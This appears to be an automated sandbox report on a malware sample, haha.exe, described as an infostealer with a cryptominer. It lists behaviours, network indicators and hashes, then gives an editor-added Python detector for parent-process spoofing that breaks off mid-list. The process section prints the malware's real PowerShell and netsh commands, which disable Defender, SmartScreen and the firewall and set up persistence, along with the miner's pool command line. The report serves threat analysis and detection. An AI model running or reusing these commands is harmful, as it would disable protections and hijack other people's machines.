Analysis Overview
SHA256
9f2c2e2bcc9acf06fde3c0066db3befe4f89dad3cc66821c1633c5491eb10a5e
Threat Level: Known bad
The file haha.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
PhoenixStealer
Suspicious use of NtCreateUserProcessOtherParentProcess
suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil
Modifies security service
XMRig Miner Payload
Downloads MZ/PE file
Modifies Windows Firewall
Executes dropped EXE
Drops startup file
Checks computer location settings
Loads dropped DLL
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Opens file in notepad (likely ransom note)
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-07-07 08:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-07-07 08:03
Reported
2022-07-07 08:14
Platform
win7-20220414-en
Max time kernel
501s
Max time network
558s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
PhoenixStealer
suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil
xmrig
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\79571.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
| N/A | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\79571.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\79571.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\79571.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1208 set thread context of 213440 | N/A | C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CbsPersist_20220707080516.log | C:\Windows\system32\NOTEPAD.EXE | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20220707080516.log | C:\Program Files\7-Zip\7zG.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CbsPersist_20220707080516.log | C:\Program Files\7-Zip\7zG.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\ProgramData\UpSys.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\ProgramData\UpSys.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\ProgramData\UpSys.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90d0dd4fd891d801 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: 0 | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\haha.exe
"C:\Users\Admin\AppData\Local\Temp\haha.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -F C:\Users\Admin\AppData\Local\Temp\79571.ps1
C:\Users\Admin\AppData\Local\Temp\79571.exe
"C:\Users\Admin\AppData\Local\Temp\79571.exe"
C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
"C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe"
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
C:\ProgramData\Systemd\procexp.exe
--url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x
C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab
C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4e8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CBS.log
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Windows\Logs\CBS\" -an -ai#7zMap20388:102:7zEvent1143
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 127.0.0.1:49173 | N/A | tcp |
| N/A | 127.0.0.1:49180 | N/A | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 52.20.78.240:443 | api.ipify.org | tcp |
| US | 52.20.78.240:443 | api.ipify.org | tcp |
| US | 52.20.78.240:443 | api.ipify.org | tcp |
| US | 52.20.78.240:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 142.132.131.248:80 | pool.hashvault.pro | tcp |
| RU | 95.142.46.35:6666 | N/A | tcp |
Files
memory/2044-54-0x0000000075441000-0x0000000075443000-memory.dmp
memory/976-55-0x0000000000000000-mapping.dmp
memory/976-57-0x0000000073F90000-0x000000007453B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\79571.ps1
| MD5 | d831df909c8d68d7ac710f09ea9a7294 |
| SHA1 | 4cf51399d9895c799c297e5e3078fa25cf4940b5 |
| SHA256 | 9771d530fb3067031df355268df854d6f162d97074ae8883ffb30b7350cf8f0c |
| SHA512 | 000959c53063ee99db5ec20448a23e6406720c611ed225b7f8ed92855c1c576b2127cb48c6508cb61a00c9ab96fc40bed81a94e5db5ff18db520aacf48ac0e77 |
C:\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
memory/1560-63-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
memory/976-65-0x0000000073F90000-0x000000007453B000-memory.dmp
\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
| MD5 | 77636b47fc9e1bc61a4a019371e09390 |
| SHA1 | 615275ae7a28ee86cd9f4f586a3c7c5366490444 |
| SHA256 | 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277 |
| SHA512 | ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d |
\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
| MD5 | 77636b47fc9e1bc61a4a019371e09390 |
| SHA1 | 615275ae7a28ee86cd9f4f586a3c7c5366490444 |
| SHA256 | 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277 |
| SHA512 | ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d |
memory/1208-68-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
| MD5 | 77636b47fc9e1bc61a4a019371e09390 |
| SHA1 | 615275ae7a28ee86cd9f4f586a3c7c5366490444 |
| SHA256 | 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277 |
| SHA512 | ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d |
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
memory/20596-71-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\DllHost.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
\Users\Admin\AppData\Local\Temp\DllHost.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
memory/20596-74-0x000007FEFBB11000-0x000007FEFBB13000-memory.dmp
memory/213440-75-0x0000000000400000-0x000000000048E000-memory.dmp
memory/213440-77-0x0000000000400000-0x000000000048E000-memory.dmp
memory/1208-79-0x0000000000400000-0x00000000005C5000-memory.dmp
memory/213512-80-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
\ProgramData\MicrosoftNetwork\System.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/213592-87-0x0000000000000000-mapping.dmp
\ProgramData\Systemd\procexp.exe
| MD5 | 2d9fb9ed8bebb55280b81a4652dcfa11 |
| SHA1 | 76300e059e74d8cfc99a736917cd3a512dd32cab |
| SHA256 | 573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf |
| SHA512 | ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c |
memory/213592-89-0x0000000000070000-0x0000000000090000-memory.dmp
C:\ProgramData\Systemd\procexp.exe
| MD5 | 2d9fb9ed8bebb55280b81a4652dcfa11 |
| SHA1 | 76300e059e74d8cfc99a736917cd3a512dd32cab |
| SHA256 | 573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf |
| SHA512 | ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c |
memory/213592-90-0x0000000000000000-0x0000000001000000-memory.dmp
memory/213512-85-0x000007FEF3590000-0x000007FEF3FB3000-memory.dmp
memory/213512-92-0x0000000002384000-0x0000000002387000-memory.dmp
memory/213512-91-0x000007FEF2970000-0x000007FEF34CD000-memory.dmp
memory/213592-94-0x0000000000000000-0x0000000001000000-memory.dmp
memory/213440-111-0x0000000000454CB9-mapping.dmp
memory/1208-115-0x0000000000400000-0x00000000005C5000-memory.dmp
memory/213512-117-0x0000000002384000-0x0000000002387000-memory.dmp
memory/213440-114-0x0000000000400000-0x000000000048E000-memory.dmp
memory/213440-131-0x0000000000400000-0x000000000048E000-memory.dmp
memory/213512-93-0x000000001B7A0000-0x000000001BA9F000-memory.dmp
memory/213972-157-0x0000000000000000-mapping.dmp
C:\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
C:\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
memory/213512-160-0x000000000238B000-0x00000000023AA000-memory.dmp
\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
memory/214008-163-0x0000000000000000-mapping.dmp
memory/213512-166-0x0000000002384000-0x0000000002387000-memory.dmp
memory/213512-167-0x000000000238B000-0x00000000023AA000-memory.dmp
C:\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
C:\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
memory/2040-172-0x0000000000000000-mapping.dmp
memory/2040-174-0x000007FEF2D30000-0x000007FEF3753000-memory.dmp
memory/2040-176-0x000007FEEEBF0000-0x000007FEEF74D000-memory.dmp
memory/2040-177-0x0000000002414000-0x0000000002417000-memory.dmp
memory/2040-178-0x000000000241B000-0x000000000243A000-memory.dmp
C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab
| MD5 | a32bd4bba702ab65887cc2819c0770f7 |
| SHA1 | aa978c40cb493b6216b74d860785051782cdb7fb |
| SHA256 | 45681c21b74225ca0e816bed870e3ddb81fc3ecbaaa4af964810321109309c4f |
| SHA512 | a7a21033b068679172019b2964cf133647120259ca6e21c915cfbc159316bf92a588aa19e73b804601e64e97f8e065e4ae1b56d51c46b53fbbc3e5e11e10e0e2 |
C:\Windows\Logs\CBS\CbsPersist_20220707080516.log
| MD5 | 65cc66bc672dfe15e3f6cd35686ccb9c |
| SHA1 | 8f64ff9c931a9a92534639fddd15f4c67936438c |
| SHA256 | 6f83c8ddccc53d8788a808fcbcf500001ffc2ee9e0be71ec01a32fed536338dd |
| SHA512 | 73b106db474ccf13557ae3a8a8351e8605b0d6f04ea1dfd66033d24aea263f9bf57e89aa5d751acb25ac622e4c4e52443d4b72fff2055810fb06f93657abf8fe |
Analysis: behavioral2
Detonation Overview
Submitted
2022-07-07 08:03
Reported
2022-07-07 08:14
Platform
win10v2004-20220414-en
Max time kernel
608s
Max time network
603s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 92304 created 67976 | N/A | C:\Windows\system32\svchost.exe | C:\ProgramData\UpSys.exe |
| PID 92304 created 94360 | N/A | C:\Windows\system32\svchost.exe | C:\ProgramData\UpSys.exe |
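This signature fires when NtCreateUserProcess is called with an explicit parent-process attribute, so the new process records a parent (here svchost.exe) other than the process that actually created it; a process-tree view then shows UpSys.exe hanging off a SYSTEM service host. The detector below is an added example by the editor, not code from the report or the sandbox: it takes process-start records that carry both the recorded PPID and, where the telemetry exposes it, the id of the calling process, and flags a mismatch; for PPID-only telemetry (Sysmon Event ID 1 records only the spoofed PPID) it falls back to a weaker heuristic, a binary in a user-writable directory claiming a core system process as parent. The record shape, the `creator_pid` field, the PIDs and the images are constructed for illustration and do not reproduce the table's PIDs, because the table does not say which column is the spoofed parent.

```python
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcessStart:
    pid: int
    image: str
    parent_pid: int               # PPID recorded on the new process (what process-tree views show)
    creator_pid: Optional[int]    # process that actually called the create API, if the telemetry has it (assumed field)


@dataclass(frozen=True)
class Finding:
    pid: int
    image: str
    reason: str


# Parents that a binary dropped in a user-writable directory has no business claiming.
SYSTEM_PARENTS = {"svchost.exe", "services.exe", "wininit.exe", "lsass.exe", "csrss.exe", "smss.exe"}
USER_WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\")


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def detect_spoofed_parents(events: List[ProcessStart]) -> List[Finding]:
    """Two checks per process start: (1) the caller and the recorded parent
    differ; (2) PPID-only heuristic for telemetry without the caller."""
    images: Dict[int, str] = {e.pid: e.image for e in events}
    findings: List[Finding] = []
    for e in events:
        claimed = basename(images.get(e.parent_pid, ""))
        if e.creator_pid is not None and e.creator_pid != e.parent_pid:
            actual = basename(images.get(e.creator_pid, "")) or "unknown"
            findings.append(Finding(e.pid, e.image,
                f"created by PID {e.creator_pid} ({actual}) but records PID {e.parent_pid} "
                f"({claimed or 'unknown'}) as parent"))
        if claimed in SYSTEM_PARENTS and e.image.lower().startswith(USER_WRITABLE_PREFIXES):
            findings.append(Finding(e.pid, e.image,
                f"binary in a user-writable directory claims {claimed} (PID {e.parent_pid}) as parent"))
    return findings


# Constructed sample process starts (illustrative PIDs, not the report's).
SAMPLE_EVENTS = [
    ProcessStart(500, r"C:\Windows\System32\wininit.exe", 400, 400),
    ProcessStart(600, r"C:\Windows\System32\services.exe", 500, 500),
    ProcessStart(1000, r"C:\Windows\System32\svchost.exe", 600, 600),
    ProcessStart(2400, r"C:\Windows\explorer.exe", 2300, 2300),
    ProcessStart(2600, r"C:\Users\Admin\AppData\Local\Temp\haha.exe", 2400, 2400),
    ProcessStart(2500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 2600, 2600),
    # UpSys.exe launched by powershell.exe but re-parented under svchost.exe
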